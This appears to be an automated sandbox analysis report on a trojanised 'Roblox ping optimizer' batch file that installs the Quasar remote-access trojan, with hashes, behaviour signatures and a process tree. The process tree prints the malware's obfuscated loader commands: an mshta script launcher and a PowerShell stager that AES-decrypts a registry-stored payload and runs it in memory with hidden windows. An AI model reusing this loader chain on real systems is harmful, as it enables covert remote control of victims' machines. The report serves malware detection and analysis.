Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
21-05-2024 22:17
Static task
static1
Behavioral task
behavioral1
Sample
RobloxPingOptimizer-Main-x64.NEW/RobloxPingOptimizer-Main-x64/Main/RobloxPingOptimizer.bat
Resource
win7-20240508-en
General
-
Target
RobloxPingOptimizer-Main-x64.NEW/RobloxPingOptimizer-Main-x64/Main/RobloxPingOptimizer.bat
-
Size
15.6MB
-
MD5
0e7fa38a2267f6c3c8b0afafda56ef99
-
SHA1
e116a71ae311011f1fc2697e84575990b75d96b4
-
SHA256
30800e9982e73ce9a2f315b05630225f57b6ae1d219902b8dcde6031d840a553
-
SHA512
75f5108166ac7224f5797941f57ada798a1bb760850677618770fb4aa7c9dd3d9298013afde66a0eba303852c9dfb2277b8bda61243c161b35975f1030ed9e98
-
SSDEEP
49152:Cdxc9riM4QO4C2ltO7iHK35ROUcdDvgVNfLH9QDn7OusKIV+cDBGVKKjU5ECeNNI:k
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/832-77-0x000002377E040000-0x000002377E7EE000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$sxr-mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation $sxr-mshta.exe -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 4156 powershell.exe -
Executes dropped EXE 5 IoCs
Processes:
$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe$sxr-cmd.exe$sxr-powershell.exepid process 1972 $sxr-mshta.exe 3532 $sxr-cmd.exe 832 $sxr-powershell.exe 4400 $sxr-cmd.exe 3876 $sxr-powershell.exe -
Drops file in System32 directory 9 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Drops file in Windows directory 6 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\$sxr-powershell.exe powershell.exe File opened for modification C:\Windows\$sxr-powershell.exe powershell.exe File created C:\Windows\$sxr-mshta.exe powershell.exe File opened for modification C:\Windows\$sxr-mshta.exe powershell.exe File created C:\Windows\$sxr-cmd.exe powershell.exe File opened for modification C:\Windows\$sxr-cmd.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 11 IoCs
Processes:
svchost.exeOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe -
Modifies registry class 1 IoCs
Processes:
$sxr-mshta.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe$sxr-powershell.exepid process 4156 powershell.exe 4156 powershell.exe 4156 powershell.exe 4156 powershell.exe 4156 powershell.exe 4156 powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe 832 $sxr-powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exe$sxr-powershell.exe$sxr-powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 4156 powershell.exe Token: SeDebugPrivilege 4156 powershell.exe Token: SeDebugPrivilege 4156 powershell.exe Token: SeDebugPrivilege 832 $sxr-powershell.exe Token: SeDebugPrivilege 832 $sxr-powershell.exe Token: SeDebugPrivilege 832 $sxr-powershell.exe Token: SeDebugPrivilege 3876 $sxr-powershell.exe Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid process 832 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exedescription pid process target process PID 908 wrote to memory of 3728 908 cmd.exe cmd.exe PID 908 wrote to memory of 3728 908 cmd.exe cmd.exe PID 908 wrote to memory of 4156 908 cmd.exe powershell.exe PID 908 wrote to memory of 4156 908 cmd.exe powershell.exe PID 1972 wrote to memory of 3532 1972 $sxr-mshta.exe $sxr-cmd.exe PID 1972 wrote to memory of 3532 1972 $sxr-mshta.exe $sxr-cmd.exe PID 3532 wrote to memory of 2796 3532 $sxr-cmd.exe cmd.exe PID 3532 wrote to memory of 2796 3532 $sxr-cmd.exe cmd.exe PID 3532 wrote to memory of 832 3532 $sxr-cmd.exe $sxr-powershell.exe PID 3532 wrote to memory of 832 3532 $sxr-cmd.exe $sxr-powershell.exe PID 832 wrote to memory of 672 832 $sxr-powershell.exe lsass.exe PID 832 wrote to memory of 672 832 $sxr-powershell.exe lsass.exe PID 832 wrote to memory of 944 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 944 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 436 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 436 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 864 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 864 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1084 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1084 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1092 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1092 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1116 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1116 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1212 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1212 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1248 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1248 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1320 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1320 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1340 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1340 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1412 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1412 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1448 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1448 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1468 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1468 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1488 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1488 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1656 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1656 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1676 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1676 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1736 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1736 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1812 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1812 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1824 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1824 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1940 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1940 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1948 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1948 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1992 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1992 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 2004 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 2004 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 1712 832 $sxr-powershell.exe spoolsv.exe PID 832 wrote to memory of 1712 832 $sxr-powershell.exe spoolsv.exe PID 832 wrote to memory of 2084 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 2084 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 2252 832 $sxr-powershell.exe svchost.exe PID 832 wrote to memory of 2252 832 $sxr-powershell.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1116
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2632
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ywMXwfUBFNVJyDSrBIVk4312:skAokGYA=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-ywMXwfUBFNVJyDSrBIVk4312:skAokGYA=%3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:ynDiyxywMz; "4⤵PID:2796
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /C set "WjUGhUhFAD=[System.Diagnostics.Process]::GetProcessById(832).WaitForExit();[System.Threading.Thread]::Sleep(5000); function RehQj($pAibt){ $vPowE=[System.Security.Cryptography.Aes]::Create(); $vPowE.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vPowE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vPowE.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('G2RKZtcN6hkpnZXTVc3gUkD6zkZNhu+HP2nFGziH5go='); $vPowE.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('SDEeaycnJbFS9015ocCOJw=='); $ntIWU=$vPowE.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $pliUW=$ntIWU.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($pAibt, 0, $pAibt.Length); $ntIWU.Dispose(); $vPowE.Dispose(); $pliUW;}function DexhB($pAibt){ $sVDkh=New-Object System.IO.MemoryStream(,$pAibt); $yryyb=New-Object System.IO.MemoryStream; Invoke-Expression '$ntNJv @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$sVDkh,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $ntNJv.CopyTo($yryyb); $ntNJv.Dispose(); $sVDkh.Dispose(); $yryyb.Dispose(); $yryyb.ToArray();}function KktQw($pAibt){ $pliUW = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($pAibt); $pliUW = RehQj($pliUW); $pliUW = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($pliUW); return $pliUW;}function execute_function($pAibt,$wEKyT){ $zjWEW = @( '$jvvcj = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::@L@o@a@d@([byte[]]$pAibt);'.Replace('@', ''), '$cDqzB = $jvvcj.EntryPoint;', '$cDqzB.Invoke($null, $wEKyT);' ); foreach ($dJqQg in $zjWEW) { Invoke-Expression $dJqQg };}$JmHSu = KktQw('y11/dHJtjD3vwONFotaskg==');$Ymipw = KktQw('Wn6/WQPtP/S46okRUKjRC+GzKvWL1VezdUredriacfw=');$vcgus = KktQw('punO0rRR5cl9FpY6wXYKog==');$ulSUs = KktQw('SE1EhvXe93ZAgL1pCIjykQ==');if (@(get-process -ea silentlycontinue $ulSUs).count -gt 1) {exit};$UGypJ = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($JmHSu).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($Ymipw);$VXpQb=DexhB (RehQj ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($UGypJ)));execute_function $VXpQb (,[string[]] ($vcgus));" & echo Invoke-Expression $env:WjUGhUhFAD; | C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass > nul5⤵
- Executes dropped EXE
PID:4400 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:WjUGhUhFAD; "6⤵PID:2316
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1812
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1940
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2004
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2084
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2752
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2844
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3120
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3388 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RobloxPingOptimizer-Main-x64.NEW\RobloxPingOptimizer-Main-x64\Main\RobloxPingOptimizer.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:LdjEKqpmmB; "3⤵PID:3728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3596
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4724
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:5044
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4624
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2820
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:5064
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1460
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:2880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1796
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:4564
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b